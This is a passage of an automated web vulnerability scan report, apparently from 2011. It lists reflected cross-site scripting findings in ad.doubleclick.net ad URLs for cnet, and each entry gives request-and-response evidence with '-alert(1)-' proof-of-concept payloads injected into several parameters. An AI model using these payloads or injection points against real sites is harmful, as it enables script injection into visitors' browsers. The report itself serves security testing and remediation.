GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=356db1"-alert(1)-"f50fc3f5031&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
07-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=356db1"-alert(1)-"f50fc3f5031&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5N
...[SNIP]...

3.162. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5af5b"-alert(1)-"d6186458506 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193815af5b"-alert(1)-"d6186458506&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/182/%2a/j%3B238347919%3B1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193815af5b"-alert(1)-"d6186458506&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppar
...[SNIP]...

3.163. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3311b'-alert(1)-'99299d172eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193813311b'-alert(1)-'99299d172eb&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193813311b'-alert(1)-'99299d172eb&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppar
...[SNIP]...

3.164. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49200"-alert(1)-"2b903183c61 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4549200"-alert(1)-"2b903183c61&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4549200"-alert(1)-"2b903183c61&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyImpUrl = "";

...[SNIP]...

3.165. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2600b'-alert(1)-'a9e12c1e8f3 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.452600b'-alert(1)-'a9e12c1e8f3&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.452600b'-alert(1)-'a9e12c1e8f3&event=58/http://www.blackberry.com">
...[SNIP]...

3.166. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 176ca"-alert(1)-"53528f4652 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOY
...[SNIP]...

3.167. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a176b"-alert(1)-"36a5848f12d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event
...[SNIP]...

3.168. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd5b"-alert(1)-"1ee697af197 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN048");
var fscUrl = url;
var fs
...[SNIP]...

3.169. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1593"-alert(1)-"9914ac032e4 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
...[SNIP]...

3.170. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bddae"-alert(1)-"32d4a8875d7 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
